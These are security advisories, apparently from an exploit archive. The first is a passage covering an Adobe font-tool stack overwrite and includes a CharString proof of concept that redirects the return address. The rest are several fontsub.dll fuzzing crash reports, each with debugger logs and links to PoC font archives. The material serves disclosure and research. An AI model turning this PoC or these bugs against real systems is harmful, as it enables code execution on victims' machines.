div 2 dup 0 put 3 dup 1 put 4 dup 2 put 5 dup 3 put 6 dup 4 put 7 dup 5 put 8 dup 6 put 9 dup 7 put 10 dup 8 put 11 dup 9 put 12 dup 10 put 13 dup 11 put 14 0 2 0 12 store 15 0 67 16 4096 4096 -64 mul mul 128 add 17 load 18 endchar --- cut --- A brief description: - Line 1 constructs a float on the stack with a binary representation of 0x41414141 - Lines 2-13 copy this value to the BuildCharArray at indexes 0-11 - Line 14 copies the 12 values from BCA to the registry #0 starting with index #2 (due to the memcpy_s bug) - Lines 15-17 call the "load" operator with arguments reg=0, i=67, count=0xc0000080 (-1073741696). This results in copying 0x200 (0xc0000080 * 4) bytes from registry #0 to &h->BCA[67], which points to the return address of the t2cParse() function on the stack. - Line 18 uses the "endchar" operator to return from the interpreter and use the overwritten return address, crashing at address 0x41414141. -----=====[ Crash logs ]=====----- When the poc.pdf file is opened with Adobe Acrobat Pro and converted to a PostScript document via "File > Export To > (Encapsulated) PostScript", the following crash occurs in Acrobat.exe: --- cut --- (2b10.3acc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=0d3993bc edx=00000200 esi=0daec260 edi=0d3992b8 eip=41414141 esp=0133a07c ebp=01000100 iopl=0 nv up ei ng nz ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297 41414141 ?? ??? 0:000> dd esp 0133a07c 41414141 41414141 41414141 41414141 0133a08c 41414141 41414141 41414141 41414141 0133a09c 41414141 41414141 41414141 0dfd96a0 0133a0ac 0dfd96a0 00000004 ffffffff 00000000 0133a0bc 00000001 66751a2a 00000000 d4385860 0133a0cc 94000400 801f0014 21ec2020 10693aea 0133a0dc 0008dda2 9d30302b 8071001e 00000000 0133a0ec 00000000 acc70000 32027007 d2aa11d1 --- cut --- -----=====[ References ]=====----- [1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/ [2] https://github.com/adobe-type-tools/afdko Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47259.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- The declaration of the public MergeFontPackage() function is as follows: --- cut --- unsigned long MergeFontPackage( const unsigned char *puchMergeFontBuffer, const unsigned long ulMergeFontBufferSize, const unsigned char *puchFontPackageBuffer, const unsigned long ulFontPackageBufferSize, unsigned char **ppuchDestBuffer, unsigned long *pulDestBufferSize, unsigned long *pulBytesWritten, const unsigned short usMode, CFP_ALLOCPROC lpfnAllocate, CFP_REALLOCPROC lpfnReAllocate, CFP_FREEPROC lpfnFree, void *lpvReserved ); --- cut --- The fifth, sixth and seventh parameters (ppuchDestBuffer, pulDestBufferSize and pulBytesWritten) are used to return a pointer to an output buffer, its size and the length of the actual content written by the API, if the routine succeeds. However, during our fuzzing, we have encountered a number of crashes caused by the function returning a pointer to a freed memory region through ppuchDestBuffer, and an invalid value in pulDestBufferSize. Thanks to the fact that the function uses a client-provided allocator, we can observe the heap allocations being made during the library runtime. If we compile the testing harness in Debug mode and run it against one of the input samples (preferably with PageHeap enabled), we should see output similar to the following: --- cut --- [...] [+] realloc(0000000000000000, 0x48b8) ---> 000001A1F1942740 [+] realloc(000001A1F1942740, 0x4ffd) ---> 000001A1F1948FF0 [+] realloc(000001A1F1948FF0, 0x57fc) ---> 000001A1F194F800 [+] realloc(000001A1F194F800, 0x60c8) ---> 000001A1F1956F30 [+] realloc(000001A1F1956F30, 0x6a75) ---> 000001A1F195E580 [+] realloc(000001A1F195E580, 0x751a) ---> 000001A1F1966AE0 [+] realloc(000001A1F1966AE0, 0x80cf) ---> 000001A1F196FF20 [+] realloc(000001A1F196FF20, 0x8db0) ---> 000001A1F1979240 [+] realloc(000001A1F1979240, 0x9bdb) ---> 000001A1F1983420 [+] realloc(000001A1F1983420, 0xab70) ---> 000001A1F198E480 [+] realloc(000001A1F198E480, 0xbc94) ---> 000001A1F199A360 [+] MergeFontPackage returned buffer 000001A1F1942740, buffer size 0x48b8, bytes written 0xae5c --- cut --- ... followed by a crash while trying to access the 0x1A1F1942740 address: --- cut --- (2664.3028): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. VCRUNTIME140D!memcpy_repmovs+0xe: 00007fff`a00b16ee f3a4 rep movs byte ptr [rdi],byte ptr [rsi] 0:000> ? rsi Evaluate expression: 1795054380864 = 000001a1`f1942740 0:000> dd rsi 000001a1`f1942740 ???????? ???????? ???????? ???????? 000001a1`f1942750 ???????? ???????? ???????? ???????? 000001a1`f1942760 ???????? ???????? ???????? ???????? 000001a1`f1942770 ???????? ???????? ???????? ???????? 000001a1`f1942780 ???????? ???????? ???????? ???????? 000001a1`f1942790 ???????? ???????? ???????? ???????? 000001a1`f19427a0 ???????? ???????? ???????? ???????? 000001a1`f19427b0 ???????? ???????? ???????? ???????? --- cut --- In the output log, we can see that a buffer of size 0x48b8 was initially allocated at address 0x1A1F1942740, but was then reallocated multiple times to incrementally grow it up to 0xbc94 bytes. However, the output values of ppuchDestBuffer and pulDestBufferSize are not updated accordingly, and so they contain the stale data written after the first allocation. Interestingly, the problem doesn't seem to affect the third output argument -- pulBytesWritten, which is correctly updated to the most recent value, and is thus bigger then *pulDestBufferSize, which should normally never happen. Returning such a stale pointer may lead to a use-after-free condition, and/or a double free when the client software decides to free the buffer on its own. This in turn may potentially lead to arbitrary code execution in the context of the fontsub.dll client process. The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47261.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered the following crash in fontsub!GetGlyphIdx: --- cut --- (4a54.4cd8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. FONTSUB!GetGlyphIdx+0x9e: 00007fff`9f4bbf96 0fb70447 movzx eax,word ptr [rdi+rax*2] ds:00000155`3b64af80=???? 0:000> ? rdi Evaluate expression: 1465580302336 = 00000155`3b64b000 0:000> ? rax Evaluate expression: -64 = ffffffff`ffffffc0 0:000> dd rdi 00000155`3b64b000 006a0010 006c006b 0111006d 00f80085 00000155`3b64b010 011100fd 02af02ae 028b02b0 028d028c 00000155`3b64b020 02e00071 01060000 01000000 00000000 00000155`3b64b030 01020000 00020000 00000000 00000000 00000155`3b64b040 00000000 00010000 03040000 07080506 00000155`3b64b050 0b0c090a 0f100d0e 13141112 17181516 00000155`3b64b060 1b1c191a 1f201d1e 23242122 27282526 00000155`3b64b070 2b2c292a 2f302d2e 33343132 37383536 0:000> !heap -p -a rdi address 000001553b64b000 found in _DPH_HEAP_ROOT @ 1553b5c1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 1553b5c2af8: 1553b64b000 1ff88 - 1553b64a000 21000 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 00007fff9f4bfd1e FONTSUB!Mem_Alloc+0x0000000000000012 00007fff9f4bc08d FONTSUB!ReadAllocCmapFormat4Ids+0x00000000000000d1 00007fff9f4bc4d1 FONTSUB!ReadAllocCmapFormat4+0x0000000000000149 00007fff9f4c31d8 FONTSUB!MakeKeepGlyphList+0x0000000000000430 00007fff9f4b6c00 FONTSUB!CreateDeltaTTFEx+0x0000000000000168 00007fff9f4b6a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb 00007fff9f4b132a FONTSUB!CreateFontPackage+0x000000000000015a [...] 0:000> k # Child-SP RetAddr Call Site 00 00000001`f4dfd660 00007fff`9f4c322a FONTSUB!GetGlyphIdx+0x9e 01 00000001`f4dfd6b0 00007fff`9f4b6c00 FONTSUB!MakeKeepGlyphList+0x482 02 00000001`f4dfd930 00007fff`9f4b6a63 FONTSUB!CreateDeltaTTFEx+0x168 03 00000001`f4dfda50 00007fff`9f4b132a FONTSUB!CreateDeltaTTF+0x2cb 04 00000001`f4dfdb90 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a [...] --- cut --- The root cause of the crash seems to be a negative index into the glyph ID array, which was not anticipated by the developer. Additionally, we've encountered a few cases where the index is negative, but the base address of the array is also NULL, resulting in attempting to access addresses close to 0xfffffffffffffffe. The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process heap. It is easiest to reproduce with PageHeap enabled (with the "Backward" option on), but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47262.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered the following crash in fontsub!FixSbitSubTables: --- cut --- (8ec.5f20): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. FONTSUB!FixSbitSubTables+0x9a9: 00007fff`b4841371 6644892446 mov word ptr [rsi+rax*2],r12w ds:0000023c`a6765000=???? 0:000> ? rsi Evaluate expression: 2459514064800 = 0000023c`a6764fa0 0:000> ? rax Evaluate expression: 48 = 00000000`00000030 0:000> ? r12w Evaluate expression: 0 = 00000000`00000000 0:000> !heap -p -a rsi address 0000023ca6764fa0 found in _DPH_HEAP_ROOT @ 23ca6681000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 23ca6683888: 23ca6764fa0 60 - 23ca6764000 2000 unknown!printable 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 00007fffb483fd1e FONTSUB!Mem_Alloc+0x0000000000000012 00007fffb48412ac FONTSUB!FixSbitSubTables+0x00000000000008e4 00007fffb4841a5a FONTSUB!FixSbitSubTableArray+0x00000000000001f6 00007fffb4842460 FONTSUB!ModSbit+0x0000000000000520 00007fffb48370aa FONTSUB!CreateDeltaTTFEx+0x0000000000000612 00007fffb4836a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb 00007fffb483132a FONTSUB!CreateFontPackage+0x000000000000015a [...] 0:000> k # Child-SP RetAddr Call Site 00 000000b1`2ccfd580 00007fff`b4841a5a FONTSUB!FixSbitSubTables+0x9a9 01 000000b1`2ccfd6c0 00007fff`b4842460 FONTSUB!FixSbitSubTableArray+0x1f6 02 000000b1`2ccfd7e0 00007fff`b48370aa FONTSUB!ModSbit+0x520 03 000000b1`2ccfd920 00007fff`b4836a63 FONTSUB!CreateDeltaTTFEx+0x612 04 000000b1`2ccfda40 00007fff`b483132a FONTSUB!CreateDeltaTTF+0x2cb 05 000000b1`2ccfdb80 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a [...] --- cut --- The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 4 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47264.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered the following crash in fontsub!MergeFormat12Cmap: --- cut --- ======================================= VERIFIER STOP 0000000000000007: pid 0x2ADC: Heap block already freed. 000001F435091000 : Heap handle for the heap owning the block. 000001F4350969C0 : Heap block being freed again. 00000000000001BC : Size of the heap block. 0000000000000000 : Not used ======================================= This verifier stop is not continuable. Process will be terminated when you use the `go' debugger command. ======================================= (2adc.5c10): Break instruction exception - code 80000003 (first chance) vrfcore!VerifierStopMessageEx+0x7dc: 00007fff`9b90263c cc int 3 0:000> k # Child-SP RetAddr Call Site 00 00000093`7bbcc730 00007fff`9b908540 vrfcore!VerifierStopMessageEx+0x7dc 01 00000093`7bbcca90 00007fff`9b7f619b vrfcore!VfCoreRedirectedStopMessage+0x90 02 00000093`7bbccb20 00007fff`9b7f4eb0 verifier!VerifierStopMessage+0xbb 03 00000093`7bbccbd0 00007fff`9b7f2582 verifier!AVrfpDphReportCorruptedBlock+0x1c0 04 00000093`7bbccc90 00007fff`9b7f2623 verifier!AVrfpDphFindBusyMemoryNoCheck+0x6a 05 00000093`7bbcccf0 00007fff`9b7f27e9 verifier!AVrfpDphFindBusyMemory+0x1f 06 00000093`7bbccd30 00007fff`9b7f41bd verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25 07 00000093`7bbccd60 00007fff`cf653ab8 verifier!AVrfDebugPageHeapFree+0x8d 08 00000093`7bbccdc0 00007fff`cf58ae08 ntdll!RtlDebugFreeHeap+0x3c 09 00000093`7bbcce20 00007fff`cf58f0c9 ntdll!RtlpFreeHeap+0xa8 0a 00000093`7bbcd050 00007fff`9b90bf42 ntdll!RtlFreeHeap+0x409 0b 00000093`7bbcd100 00007fff`cca3984c vrfcore!VfCoreRtlFreeHeap+0x22 0c 00000093`7bbcd150 00007fff`aa5491fe msvcrt!free+0x1c 0d 00000093`7bbcd180 00007fff`aa5496f8 FONTSUB!MergeFormat12Cmap+0x12e 0e 00000093`7bbcd250 00007fff`aa54b046 FONTSUB!MergeCmapTables+0x444 0f 00000093`7bbcd330 00007fff`aa54baac FONTSUB!MergeFonts+0x5a6 10 00000093`7bbcd4e0 00007fff`aa5414b2 FONTSUB!MergeDeltaTTF+0x3ec 11 00000093`7bbcd620 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132 [...] --- cut --- A similar double-free crash was also observed at FONTSUB!MergeFormat12Cmap+0x13b, which is the second free() call directly after a MakeFormat12MergedGlyphList() call. The root cause of the crash seems to be the fact that in case of an error, the MakeFormat12MergedGlyphList() function frees the buffer pointed to by its first/third argument, and then its caller, MergeFormat12Cmap(), also unconditionally frees both buffers. The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47263.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered crashes in fontsub!ReadTableIntoStructure similar to the following: --- cut --- (7ac.378c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. FONTSUB!ReadTableIntoStructure+0x378: 00007fff`c0874150 6689540110 mov word ptr [rcx+rax+10h],dx ds:000001f7`a7429010=???? 0:000> ? rcx Evaluate expression: 32 = 00000000`00000020 0:000> ? rax Evaluate expression: 2163174707168 = 000001f7`a7428fe0 0:000> ? dx Evaluate expression: 3 = 00000000`00000003 0:000> !heap -p -a rax address 000001f7a7428fe0 found in _DPH_HEAP_ROOT @ 1f7a7271000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 1f7a7276c98: 1f7a7428fe0 20 - 1f7a7428000 2000 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012 00007fffc0875562 FONTSUB!MergeEblcEbdtTables+0x0000000000000b02 00007fffc086b0a3 FONTSUB!MergeFonts+0x0000000000000603 00007fffc086baac FONTSUB!MergeDeltaTTF+0x00000000000003ec 00007fffc08614b2 FONTSUB!MergeFontPackage+0x0000000000000132 [...] 0:000> k # Child-SP RetAddr Call Site 00 000000d8`664fd3d0 00007fff`c0875599 FONTSUB!ReadTableIntoStructure+0x378 01 000000d8`664fd480 00007fff`c086b0a3 FONTSUB!MergeEblcEbdtTables+0xb39 02 000000d8`664fd690 00007fff`c086baac FONTSUB!MergeFonts+0x603 03 000000d8`664fd840 00007fff`c08614b2 FONTSUB!MergeDeltaTTF+0x3ec 04 000000d8`664fd980 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132 [...] --- cut --- In total, we have discovered crashes in four different locations inside the ReadTableIntoStructure() function. The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 4 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47265.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered the following crash in fontsub!ReadAllocFormat12CharGlyphMapList: --- cut --- (5a30.397c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. FONTSUB!ReadAllocFormat12CharGlyphMapList+0x13d: 00007fff`c086cf8d 448904c8 mov dword ptr [rax+rcx*8],r8d ds:00000225`050b9000=???????? 0:000> ? rax Evaluate expression: 2358021689232 = 00000225`050b8f90 0:000> ? rcx Evaluate expression: 14 = 00000000`0000000e 0:000> ? r8d Evaluate expression: 4294967286 = 00000000`fffffff6 0:000> !heap -p -a rax address 00000225050b8f90 found in _DPH_HEAP_ROOT @ 22505011000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 22505012478: 225050b8f90 68 - 225050b8000 2000 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012 00007fffc086cf24 FONTSUB!ReadAllocFormat12CharGlyphMapList+0x00000000000000d4 00007fffc08706cd FONTSUB!ModCmap+0x0000000000000459 00007fffc0866eab FONTSUB!CreateDeltaTTFEx+0x0000000000000413 00007fffc0866a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb 00007fffc086132a FONTSUB!CreateFontPackage+0x000000000000015a [...] 0:000> k # Child-SP RetAddr Call Site 00 000000ad`62cfd4b0 00007fff`c08706cd FONTSUB!ReadAllocFormat12CharGlyphMapList+0x13d 01 000000ad`62cfd520 00007fff`c0866eab FONTSUB!ModCmap+0x459 02 000000ad`62cfd660 00007fff`c0866a63 FONTSUB!CreateDeltaTTFEx+0x413 03 000000ad`62cfd780 00007fff`c086132a FONTSUB!CreateDeltaTTF+0x2cb 04 000000ad`62cfd8c0 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a [...] --- cut --- The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47266.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered the following crash in fontsub!WriteTableFromStructure: --- cut --- (3890.25ac): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. FONTSUB!WriteTableFromStructure+0x6e: 00007fff`aa544326 0fb74810 movzx ecx,word ptr [rax+10h] ds:000001ac`2d48a000=???? 0:000> dd rax 000001ac`2d489ff0 d0d0d0c0 d0d0d0d0 d0d0d0d0 d0d0d0d0 000001ac`2d48a000 ???????? ???????? ???????? ???????? 000001ac`2d48a010 ???????? ???????? ???????? ???????? 000001ac`2d48a020 ???????? ???????? ???????? ???????? 000001ac`2d48a030 ???????? ???????? ???????? ???????? 000001ac`2d48a040 ???????? ???????? ???????? ???????? 000001ac`2d48a050 ???????? ???????? ???????? ???????? 000001ac`2d48a060 ???????? ???????? ???????? ???????? 0:000> !heap -p -a rax address 000001ac2d489ff0 found in _DPH_HEAP_ROOT @ 1ac2d041000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 1ac2d0495b0: 1ac2d489ff0 1 - 1ac2d489000 2000 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 00007fffaa53fd1e FONTSUB!Mem_Alloc+0x0000000000000012 00007fffaa545562 FONTSUB!MergeEblcEbdtTables+0x0000000000000b02 00007fffaa53b0a3 FONTSUB!MergeFonts+0x0000000000000603 00007fffaa53baac FONTSUB!MergeDeltaTTF+0x00000000000003ec 00007fffaa5314b2 FONTSUB!MergeFontPackage+0x0000000000000132 [...] 0:000> k # Child-SP RetAddr Call Site 00 00000078`dc2fd380 00007fff`aa545634 FONTSUB!WriteTableFromStructure+0x6e 01 00000078`dc2fd490 00007fff`aa53b0a3 FONTSUB!MergeEblcEbdtTables+0xbd4 02 00000078`dc2fd6a0 00007fff`aa53baac FONTSUB!MergeFonts+0x603 03 00000078`dc2fd850 00007fff`aa5314b2 FONTSUB!MergeDeltaTTF+0x3ec 04 00000078`dc2fd990 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132 [...] --- cut --- The root cause of the crash seems to be the fact that the MergeEblcEbdtTables() function may allocate a 0-sized buffer and pass it to WriteTableFromStructure() as one of the fields of a structure passed through the fifth argument, but the WriteTableFromStructure() function assumes that the buffer is at least 32 bytes long, and unconditionally reads from it at offset 16, and other offsets later on in the routine. The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47267.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered the following crash in fontsub!MakeFormat12MergedGlyphList: --- cut --- (48e4.50e0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. FONTSUB!MakeFormat12MergedGlyphList+0x176: 00007fff`c086908a 458904ca mov dword ptr [r10+rcx*8],r8d ds:000001a4`4ebf1000=???????? 0:000> ? r10 Evaluate expression: 1805184796672 = 000001a4`4d660800 0:000> ? rcx Evaluate expression: 2826496 = 00000000`002b2100 0:000> ? r8d Evaluate expression: 5 = 00000000`00000005 0:000> dd r10 000001a4`4d660800 00000000 00000000 00000020 00000003 000001a4`4d660810 00000021 00000004 00000022 00000005 000001a4`4d660820 00000023 00000006 00000024 00000007 000001a4`4d660830 00000025 00000008 00000026 00000009 000001a4`4d660840 00000027 0000000a 00000028 0000000b 000001a4`4d660850 00000029 0000000c 0000002a 0000000d 000001a4`4d660860 0000002b 0000000e 0000002c 0000000f 000001a4`4d660870 0000002d 00000010 0000002e 00000011 0:000> !heap -p -a r10 address 000001a44d660800 found in _DPH_HEAP_ROOT @ 1a44c521000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 1a44c5255b0: 1a44d660800 1590800 - 1a44d660000 1592000 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012 00007fffc0869011 FONTSUB!MakeFormat12MergedGlyphList+0x00000000000000fd 00007fffc08691ee FONTSUB!MergeFormat12Cmap+0x000000000000011e 00007fffc08696f8 FONTSUB!MergeCmapTables+0x0000000000000444 00007fffc086b046 FONTSUB!MergeFonts+0x00000000000005a6 00007fffc086baac FONTSUB!MergeDeltaTTF+0x00000000000003ec 00007fffc08614b2 FONTSUB!MergeFontPackage+0x0000000000000132 [...] 0:000> k # Child-SP RetAddr Call Site 00 0000000c`1c7dd310 00007fff`c08691ee FONTSUB!MakeFormat12MergedGlyphList+0x176 01 0000000c`1c7dd350 00007fff`c08696f8 FONTSUB!MergeFormat12Cmap+0x11e 02 0000000c`1c7dd420 00007fff`c086b046 FONTSUB!MergeCmapTables+0x444 03 0000000c`1c7dd500 00007fff`c086baac FONTSUB!MergeFonts+0x5a6 04 0000000c`1c7dd6b0 00007fff`c08614b2 FONTSUB!MergeDeltaTTF+0x3ec 05 0000000c`1c7dd7f0 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132 [...] --- cut --- The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 2 proof of concept malformed font files which trigger the crash. Proof of Concept: 